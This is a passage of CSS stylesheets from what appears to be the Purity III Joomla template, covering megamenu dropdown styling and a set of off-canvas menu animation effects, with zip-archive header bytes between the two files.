  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    content: " ";
    display: table;
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -15px;
  margin-right: -15px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #cc0000;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKԜ�\�vٶcOcO.purity_iii/local/css/themes/red/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
